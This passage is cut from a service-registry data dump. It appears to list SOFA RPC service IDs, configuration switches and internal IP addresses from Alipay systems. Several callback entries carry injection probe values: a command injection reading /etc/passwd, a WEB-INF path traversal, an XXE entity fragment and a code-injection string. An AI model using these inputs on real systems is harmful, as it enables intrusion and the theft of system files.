.securityexprod.common.service.facade.lisa.Z50BDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.search.AssetSearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.BroadNamePredService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.test.facade.ShadowUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.emergency.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.flab.facade.oauth.TaobaoOAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotcms_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiletms.plugin.common.service.facade.api.PluginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.14.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.falcon.common.facade.ScenarioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.reInitialize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.comment.CommentGZQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.electronicPolicyUrlSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.rule.ItemRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FcProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKHavanaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsmp.common.service.facade.security.AppIdentifyAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloancollection-SmartfProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.order.AutoServiceBuyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.schudeler.SyncRepairStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.sninvalid.AssetInfoInvalidationSpiFacade:1.0:mdeviceprod_assetInfoInvalidation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.trade.TradeMainInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyCifPasswordVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.serve.api.ShopServeAggQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:mtmallcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:mvcdemorenfei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.reachshop.StoreRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:algoevaluator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_createProdCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.PdServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.cicada.InsDebugQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.tinyappdata.api.TinyAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo-yihuan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.wrapper.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINDATACANAL#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.amspm.core.plugin.config.drm.BizIdentityConfigDrmResource.rulePageSizeListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.common.adapter.prod.tel.AliTelProdClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.prodmng.invest_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkinstportal.common.service.facade.robot.api.BsnRegistryOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.ZpaasOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.gpRateRefreshSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finecorisk.common.facade.service.api.query.YebsTransferOutOrderQueryCountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activitymanage.ActivityCrowdConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.151.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.obrevcore_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.170.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainevent.drm.ComplainInfoDrmResource.complainSearch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.contract.ContractQueryFacade:1.0:contractQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipromofront.common.service.facade.service.rpc.promokernel.CampaignConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:kbticketcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprofile.facade.dqs.api.IProfilePropertyQualityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-graphanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.cashpool.CashPoolAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.zerodivisor.ZeroDivisorAttackResultFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.permlimitnear:name=com.alipay.rule.core.engine.config.RuleEngineResource.threadConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.query.fund.api.QueryAccReconLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:packageApplyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.voucherprod.facade.api.voucher.VcpVoucherDirectUseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_DAMIN_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxprod.common.service.facade.api.leads.LeadsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.platform.common.service.facade.iface.RiskAxelMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.portal.RptViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.CifinDataQueryDrmResourceTrigger.isUseCifThinQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:mytradeapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.65.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@girisk#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:mali@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.survey.PromoSurveyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepboss.common.service.facade.wallet.WalletQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.trade.facade.basetrade.ISellerTradeCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhcprod.common.service.facade.SummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.SysParamService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:BFRXATCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.agds.master.dubbo.ModelTestInfoManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.plan.EquityCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.pms.common.service.facade.api.MobileClientPackageMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ebpp.ChargeOutInstMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.10.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insptmarket.facade.sale.combine.api.CombineSaleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0: ]> &test;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.248.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.comment.ServiceCommentQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.237.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ropservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.BkLoanSupportTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.queryModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:dcepweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.audit.CommonAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuprodFlowGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:invoicecommercial@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.GreyListWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aks.facade.cluster.ops.ClusterOpsPdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.page.PageEditServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_FINSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.246.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:return \"antscanner\"+\"niravana\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.common.statistics.api.MiniAccountStatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.validate.spi.SpiValidateFacade:1.0:PCBENEFIT_JB_NEWER13_GRADEFREECARD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";cat /etc/passwd;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.SubAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Gaode.appId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityInvitationCodeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbleadscenter.common.service.facade.leads.LeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_1209#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:fpdecisionplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-sccounter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0://../....//....//WEB-INF/web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers__SAMPLETOPIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfocore.common.service.facade.fop.api.mng.MsgSenderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.node.NodeTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.unread.api.UserUnreadMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.query.MiniAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopShopConfig.forbiddenMsgForAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zpaascoreng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.o2o.facade.EquipmentQueryExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.192.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.withdraw.WithdrawPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.scenecustom.api.SceneGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acsubscriberprod.facade.service.EventCodeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.rest.DomainServiceExecRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cssocial.common.service.facade.api.WeiboMessageScan:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_branchFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.ldc.demo.TestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthcore.common.service.facade.api.send.SendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.244.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bds.facade.scene.BdsSceneRequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promoplatform_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.portrayal.PortrayalModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.wealthasset.FundAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.theme.ThemeViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@adatabus#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyRuleManager.confCacheInSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.config.LogicalTableScheduleConfigOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.paymentmng.SHAREDATADataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@consumeprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.cifcommon.business.platform.bankcard.facade.WithdrawCardQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.campaign.mng.SceneSchemaManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.117.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.zcache.tbase.customerv2.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.globalsite.ipaycrm.facade.api.CrmMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.encrypt.EncryptManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:secrethbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.after.InvestEquityCommunicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.account.LifeAppOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smsgw.common.service.monitor.RouteQueueMonitorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tcc.common.service.facade.api.UseCaseLibEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.cschat.CsChatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:exratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.ChatFileMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierUserAndBizInfoFacade:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.RepayPeriodConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_ACCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.advert.LifeMsgForAdvertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbf.model.service.IPluginDebugService:1.0:tbfinfra@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.failover.api.FailoverSwitchService:1.0:acctrans_failover_switch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.lockinPeriodProductFundCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:quoteRefQuerySupergwCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.common.service.facade.api.SignService:1.0:esign@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.treasurycenter.facade.api.fund.TreasuryFundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:nfcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OdpsDataSourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ArgoPublishVipActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rule.api.RuleOperateFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.libview.facade.LibViewRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hawkeye.common.service.facade.api.DataTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.data.DataAttackRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acticketcore.kernel.common.service.facade.ScriptFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.170.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.BPInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRolePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ZoneEnvUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.hf.service.HfTaskUpdateFacade:1.0@DEFAUL